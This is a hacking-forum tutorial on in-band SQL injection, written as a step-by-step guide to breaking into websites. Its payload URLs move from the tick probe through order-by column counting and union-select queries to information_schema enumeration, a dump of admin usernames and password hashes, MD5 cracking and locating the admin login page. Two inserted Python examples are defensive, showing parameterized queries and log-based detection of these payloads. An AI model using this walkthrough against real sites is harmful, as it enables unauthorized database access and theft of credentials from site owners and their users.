"Under democracy one party always devotes its chief energies to trying to prove that the other party is unfit to rule - and both commonly succeed, and are right." - H.L. Mencken
Okay, let me get this part out of the way...
You are you, and you know what is legal and illegal. I am creating this post for information purposes only. Any actions brought forth by the information held within this post are purely the fault of the user, and not mine.
Now to the good junk...
How to hack a website? How to dump a database? How to steal logins? How to deface a site?
Well, the answer to all those questions can be solved with SQLi
In this post I will not be talking about how SQL works; that is something you need to, and should want to, go learn in your own spare time. I will however be covering some basic how-to's on SQLi.
First, I want to explain in a very simple manner how SQLi works. Imagine a site that displays information from a database using code such as:
CODE :
$query = "SELECT * FROM db_posts WHERE post_id = '" . $_GET['post_id'] . "';";
When you insert a tick mark ' followed by other SQL, this may trick the query into doing something undesired. So let's say we use ' or '1'='1; the query would be processed like so:
CODE :
SELECT * FROM db_posts WHERE post_id = '' or '1'='1';
This will tell the db to dump all the details inside db_posts, instead of just the desired post_id.
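The concatenation above is the whole problem, and the fix is to bind the value instead of pasting it into the query text. The following Python/SQLite snippet is an added example, not code from the original post: it builds a constructed three-row db_posts table, runs the same ' or '1'='1 input through a concatenated query and a parameterized one, and counts the rows each returns. The table contents and function names are my own.

```python
import sqlite3

# Constructed sample rows standing in for the db_posts table in the post's example.
POSTS = [("1", "first post"), ("2", "second post"), ("3", "third post")]


def make_db():
    """Create an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE db_posts (post_id TEXT, body TEXT)")
    conn.executemany("INSERT INTO db_posts VALUES (?, ?)", POSTS)
    return conn


def lookup_vulnerable(conn, post_id):
    """The pattern from the post: the user-supplied value is pasted into the SQL text,
    so a quote inside it ends the string literal and the rest is parsed as SQL."""
    query = "SELECT * FROM db_posts WHERE post_id = '" + post_id + "'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, post_id):
    """The fix: the value travels as a bound parameter, never as part of the SQL text,
    so quotes inside it are just characters compared against the post_id column."""
    return conn.execute(
        "SELECT * FROM db_posts WHERE post_id = ?", (post_id,)
    ).fetchall()


def compare(post_id):
    """Return how many rows each variant yields for the same input."""
    conn = make_db()
    try:
        return {
            "vulnerable": len(lookup_vulnerable(conn, post_id)),
            "parameterized": len(lookup_parameterized(conn, post_id)),
        }
    finally:
        conn.close()


if __name__ == "__main__":
    print("normal id 1:", compare("1"))          # both return 1 row
    print("injected:", compare("' or '1'='1"))   # vulnerable: 3 rows, parameterized: 0
```

Run it directly to see the row counts: the vulnerable variant hands back every row for the injected input, while the parameterized one returns none, because the driver compares the quote as data instead of letting the database parse it as SQL.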
There are three classes in which SQLi can be grouped into:
1.) Inband - Data is extracted using the same channel that is used to inject the SQL code and the data is presented directly in the application web page.
2.) Out of Band - Data is retrieved using a different channel, e.g. an e-mail.
3.) Inferential - There is no actual transfer of data. You send the server statements that are either true or false, and observe the behaviour of the website/DB server to determine whether the query was true.
In this how to, I will be covering Inband SQLi. (I will cover blind/Inferential in another post in the future)
(For the remainder of this tutorial I will be using "http://ninjex/page.asp?id=1" as an example of a vuln site)
Next up I want to make four things clear in which you really need to know when performing a SQLi attack. That is the differences between:
1.) Error - You ask the Database a question, and look for useful information that it may send back.
CODE :
http://ninjex/page.asp?id=1 or 1=convert(int,(USER))--
The database may send back something like:
Syntax error converting the nvarchar value '[Ninjected]' to a column of data type int.
2.) Union - Union is used to add two or more select SQL statements into one result.
3.) Blind - Asking the DB a true/false question while watching how the page reacts to the question. You may send timing questions to the server, such as telling it:
If the table name is 2 characters in length, respond in 5 seconds -- If you get an immediate response, you know it is false. You do this as many times as needed to determine your table/column names, etc.
4.) ' - The single quote, also referred to as a tick, is used to test for an SQLi vuln. This is usually appended to the end of a URL.
For a website to be vulnerable to SQLi via the URL, it usually has GET parameters and looks similar to:
http://ninjex/page.asp?id=1
http://ninjex/page.php?user=1
http://ninjex/news.php?id=853
etc
As you can see, you are really just looking for "?something=value", where something is a parameter name and value is a number/string value.
To test the URL for an SQLi vuln, we need to use our tick as described above, such as:
CODE :
http://ninjex/page.asp?id=1'
Now, there are a few things which could happen at this point:
1.) SQLi Error - The website will display the SQL error straight to the webpage screen you are viewing.
2.) Page Redirect - The website will redirect you to another web page.
3.) Nothing - Just like it says, nothing may happen at all.
Alright, so if you get a SQLi error, it means we can go ahead and use Inband SQLi. The first thing we want to do is figure out how many columns the query returns. To do this, we use a URL similar to the following:
CODE :
http://ninjex/page.asp?id=1 order by 1--
The code above asks the database to sort the result by its first column. If the query has at least 1 column, the page will appear normal in front of you without any errors being produced. If that is the case, you need to keep increasing the number until you get an error, i.e.:
CODE :
http://ninjex/page.asp?id=1 order by 1--
(No error)
CODE :
http://ninjex/page.asp?id=1 order by 10--
(Error -- You now know that it has at least 1, but fewer than 10 columns)
CODE :
http://ninjex/page.asp?id=1 order by 5 --
(Error -- You now know it has at least 1, but fewer than 5 columns)
CODE :
http://ninjex/page.asp?id=1 order by 4 --
(No error -- You know it has 4 columns, since 5 produced an error and 4 did not)
So next, we need to figure out which columns are vulnerable for us to exploit, to do this we need to remember the total number of columns, as well as use our union statement in a syntax like so:
CODE :
http://ninjex/page.asp?id=1 union all select 1,2,3,4--
or (I tend to always change the value after = to null. This makes it easier to read the vuln columns, and sometimes with a non-null value the vuln columns will not be displayed on the screen.)
CODE :
http://ninjex/page.asp?id=null union all select 1,2,3,4--
This will output some numbers onto the web page. These numbers can be anywhere, but keep note of one of them once you find it. Let's hypothetically say that I ran:
CODE :
http://ninjex/page.asp?id=null union all select 1,2,3,4--
and it displayed the numbers 2 and 4 on my web page. Either one of those columns is exploitable. So next, we need to go ahead and grab the version of the DB (I will only cover how to exploit 5.0+ databases due to their much simpler nature). To do this, we use @@version in the vuln column like so:
CODE :
http://ninjex/page.asp?id=null union all select 1,@@version,3,4--
This should give us the version number where the number 2 previously appeared on our screen. If it is 5.0+, we can continue; if it is 4.0 or lower, I suggest moving to another site, as it is much harder, yet not impossible, to exploit.
So next, we need to figure out the names of our tables, to do this we will use group_concat() on the vuln column, as well as a few other commands to grab information from. The syntax will look like the following:
CODE :
http://ninjex/page.asp?id=null union all select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--
Now let's hypothetically say that on the screen, where the number 2 used to be, now shows our list of tables with the names of: admin, user, login, email
So next we need to choose which table we want to exploit. In most cases, we would want either the admin or the login. So let's exploit the admin table, and find out what columns are inside of it.
Here, we will be using hex encoding for the table name. We need our table name converted to hex; to do this use either software (I use hackbar addon for firefox) or a website such as: http://encodertool.com/hexadecimal
Now, we see that admin converted to hex is "61646d696e"; we just need to add 0x to the front of that, so "0x61646d696e" is what we use for the table name.
Also, as a side note, we will be using "0x3a", which is hex for a colon ":". This will be used to separate the two columns in the dump later on.
So, now onto the good stuff of getting our column names inside of our admin table. To do that we use the following syntax:
CODE :
http://ninjex/page.asp?id=null union all select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x61646d696e--
Now let's hypothetically say the columns inside the admin table are: username, password, and id. We would at this point want to dump the details from inside the username and password column, so we use the following syntax to do so:
CODE :
http://ninjex/page.asp?id=null union all select 1,group_concat(username,0x3a,password),3,4 from admin--
Let's now say that it hypothetically printed out: "Ninjex:e00cf25ad42683b3df678c61f42c6bda"
Usually the password is in MD5 format, so after finding the original value of the hash above, we see the password is "admin1"
Lastly, you can crawl the website or use an admin page finder such as this site to try and figure out where to login with the admin credentials.
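Every step of the walkthrough above leaves a recognisable trail in the web server's access log: a lone quote, an order by N probe, union all select, @@version, information_schema and group_concat. As an added example that is not part of the original post, the Python script below parses a few constructed Common Log Format lines (the IP addresses, timestamps and byte counts are made up; the request paths reuse the tutorial's own URLs), URL-decodes each query string, matches it against those signatures, and decodes any 0x hex literals so an analyst can see which table name was being looked up. The sample log, the signature names and the helper functions are my own.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines showing the tutorial's probe sequence against its example host,
# followed by one ordinary request. None of these are real captures.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2012:13:55:36 +0000] "GET /page.asp?id=1 HTTP/1.1" 200 2326
203.0.113.5 - - [10/Oct/2012:13:55:41 +0000] "GET /page.asp?id=1%27 HTTP/1.1" 500 512
203.0.113.5 - - [10/Oct/2012:13:55:49 +0000] "GET /page.asp?id=1%20order%20by%205-- HTTP/1.1" 500 512
203.0.113.5 - - [10/Oct/2012:13:56:02 +0000] "GET /page.asp?id=null%20union%20all%20select%201,@@version,3,4-- HTTP/1.1" 200 2401
203.0.113.5 - - [10/Oct/2012:13:56:15 +0000] "GET /page.asp?id=null%20union%20all%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=0x61646d696e HTTP/1.1" 200 2590
198.51.100.7 - - [10/Oct/2012:13:57:01 +0000] "GET /news.php?id=853 HTTP/1.1" 200 1843
"""

# Common Log Format: client ip, identity, user, [timestamp], "METHOD target PROTO", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# One signature per step of the walkthrough, matched case-insensitively on the decoded query string.
SIGNATURES = {
    "tick": re.compile(r"'"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "version_fingerprint": re.compile(r"@@version", re.I),
    "schema_enumeration": re.compile(r"\binformation_schema\.", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
}

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")


def decode_hex_literals(text):
    """Return the ASCII strings hidden in 0x... literals (0x61646d696e -> 'admin'); skip undecodable ones."""
    decoded = []
    for hexdigits in HEX_LITERAL.findall(text):
        if len(hexdigits) % 2:
            continue
        try:
            decoded.append(bytes.fromhex(hexdigits).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def analyze_line(line):
    """Parse one log line; return a finding when the decoded query matches any signature, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    query = unquote_plus(parts.query)  # undo %27, %20 etc. so the signatures see plain text
    hits = sorted(name for name, pat in SIGNATURES.items() if pat.search(query))
    if not hits:
        return None
    return {
        "ip": m.group("ip"),
        "status": int(m.group("status")),
        "path": parts.path,
        "signatures": hits,
        "decoded_hex": decode_hex_literals(query),
        "query": query,
    }


def scan_log(text):
    """Run analyze_line over every line of the log and return the findings in order."""
    return [f for f in (analyze_line(ln) for ln in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], finding["status"], finding["signatures"], finding["decoded_hex"])
```

Note that the status code is carried along: the tick and the order by probe here come back as 500s, which is the "SQLi error" outcome from the list above and is worth alerting on by itself, while the later union requests return 200 and would pass unnoticed by an error-rate monitor alone.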
Enjoy,
- -Ninjex-
HackThisSite is the collective work of the HackThisSite staff, licensed under a CC BY-NC license.
We ask that you inform us upon sharing or distributing.